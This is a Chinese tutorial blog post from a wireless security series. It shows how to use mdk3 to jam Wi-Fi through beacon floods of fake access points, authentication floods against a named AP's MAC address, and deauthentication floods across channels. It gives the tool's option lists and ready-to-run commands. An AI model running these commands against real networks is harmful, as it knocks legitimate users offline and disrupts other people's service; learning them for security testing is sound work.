无线安全专题_攻击篇--干扰通信

中秋节玩的比较嗨,无线安全专题的文章就拖沓了一下,见谅见谅。。。上篇讲解了无线安全专题_破解篇03--打造个人字典,有感兴趣的朋友给我私信,还有在公众号中给我留言说,希望我讲解一下彩虹表和GPU破解的事情,所以我为了响应大家的需求,我之后会在破解篇中再增加一篇专门讲解彩虹表和GPU破解的问题。今天咱们就开启无线安全专题下一篇:攻击篇。攻击篇主要分为两个部分:一个是不连接上无线下的攻击,一个是连接上无线下的攻击。本次讲解的就是如何在不连接无线的情况下进行攻击(仅仅是讨论技术,切不要进行恶意使用),主要使用的工具是kali下面的mdk3。

一.伪造大量的死亡AP信号,干扰通信

首先咱们将无线网卡切换到监听模式(怎么切换的,请看我之前写的文章),伪造大量的AP信号使用的是mdk3的b参数。

b - Beacon Flood Mode

Sends beacon frames to show fake APs at clients.

This can sometimes crash network scanners and even drivers!

OPTIONS:

-n Use SSID instead of randomly generated ones 给AP信号指定名称,不使用就随机生成

-f Read SSIDs from file 可以从文件中读取AP名称

-v Read MACs and SSIDs from file. See example file!  可以从文件中读取ap mac和名称

-dShow station as Ad-Hoc  自定义为Ad-Hoc模式

-wSet WEP bit (Generates encrypted networks) 自定义为wep加密

-gShow station as 54 Mbit自定义为54M模式

-tShow station using WPA TKIP encryption自定义为wpaTKIP加密

-aShow station using WPA AES encryption自定义为wpaAES加密

-mUse valid accesspoint MAC from OUI database  读取数据库中的mac

-hHop to channel where AP is spoofed。This makes the test more effective against some devices/drivers。But it reduces packet rate due to channel hopping.

-c Fake an AP on channel . If you want your card to hop onl, this channel, you have to set -h option, too! 自定义信道

-s Set speed in packets per second (Default: 50) 自定义发包速率

1.1 伪造一个名称为为qiye1,信道为1,发包速率为200的AP信号

mdk3 wlan1 b -n qiye1 -c 1 -p 200

1.2 伪造一个名称为为qiye1,信道为1,发包速率为200,加密方式为wpa AES的AP信号

mdk3 wlan1 b -n qiye1 -c 1 -p 200 -a

从手机上可以看到qiye1这个信号是加密的。

1.3 根据文件中的名称伪造AP信号,信道为2。

mdk3 wlan1 b -f FakeAPName.txt -c 2

执行完成后,在电脑上可以看到下图的效果,显示了我自定义文件中的AP名称:

1.4 随机伪造大量ap信号,信道为1

mdk3 wlan1 b -g -c 1

电脑上会显示各种乱七八糟命名的无线信号,填满整个无线列表。

二.验证洪水攻击方式,干扰通信,甚至可以干掉无线路由。

mdk3自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应,这个可以用来强迫用户重启路由。

a - Authentication DoS mode

Sends authentication frames to all APs found in range.

Too much clients freeze or reset almost every AP.

OPTIONS:

-a   Only test the specified AP  攻击目标AP的mac,可以看之前的欺骗篇,可以知道怎么回去ap  mac

-m  Use valid client MAC from OUI database 使用数据库中mac

-c  Do NOT check for test being successful 不检测测试是否成功

-i Perform intelligent test on AP (-a and -c will be ignored) 智能测试This test connects clients to the AP and reinjects sniffed data to keep them alive

-s   Set speed in packets per second (Default: unlimited) 发包速率

攻击名称为qiye,mac地址为FC:D7:33:DE:F3:8A的无线AP。

mdk3 wlan1 a -a FC:D7:33:DE:F3:8A -c  -s 300

发起攻击后,一直处于连接状态,直到超时。手机也是这种情况,点击连接后没有什么反应。

三.强制解除验证洪水攻击方式。

在这种模式下,软件会想周围所有的AP发送强制解除验证数据包,迫使所有连接上AP的客户端掉线,无响应。

d - Deauthentication / Disassociation Amok Mode

Kicks everybody found from AP

OPTIONS:

-w   Read file containing MACs not to care about (Whitelist mode) 指定白名单mac

-b   Read file containing MACs to run test on (Blacklist Mode) 指定mac黑名单

-s   Set speed in packets per second (Default: unlimited) 发包速率

-c [chan,chan,chan,...]  Enable channel hopping. Without providing any channels, mdk3 will hop an all 14 b/g channels. Channel will be changed every 5 seconds.指定信道,可以用逗号分隔多个信道

3.1 攻击名称为qiye,mac地址为FC:D7:33:DE:F3:8A的无线AP,使我客户端掉线无法上网。

mdk3 wlan1 d -b blacklist.txt

电脑掉线之后重新连接,发现已经连不上了。

3.2 直接按照信道进行全范围攻击

直接将我扫描到的所有信道进行攻击。

mdk3 wlan1 d  -c 6,11,4,3,13,7

今天的分享就到这里,下一篇继续分析。如果大家觉得还可以呀,记得推荐呦。

文/qiye(简书作者)

原文链接:http://www.jianshu.com/p/90e3dda99ade

著作权归作者所有,转载请联系作者获得授权,并标注“简书作者”。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 203,362评论 5 477
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,330评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,247评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,560评论 1 273
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,580评论 5 365
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,569评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,929评论 3 395
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,587评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,840评论 1 297
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,596评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,678评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,366评论 4 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,945评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,929评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,165评论 1 259
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 43,271评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,403评论 2 342

推荐阅读更多精彩内容

  • 中秋节玩的比较嗨,无线安全专题的文章就拖沓了一下,见谅见谅。。。上篇讲解了无线安全专题_破解篇03--打造个人字典...
    qiye阅读 901评论 0 12
  • 转:https://blog.csdn.net/acs713/article/details/8740974?ut...
    right_33cb阅读 2,426评论 0 7
  • Ess 人类可记忆 的名字(wifi名字)Bss 无线ap 的mac地址破解WiFi看下面 破解wpa iwcon...
    杰罗xr阅读 2,938评论 0 11
  • 5.1数据链路层服务 概述 术语: v ■主机和路由器:结点(nodes) v ■连接相邻结点的通信信道:链路(l...
    龟龟51阅读 1,883评论 0 1
  • 协议 802.11标准简介 介绍:802.11标准定义的是一个数据链路层(link-layer)的无线协议,该标准...
    四月的风Er阅读 680评论 0 0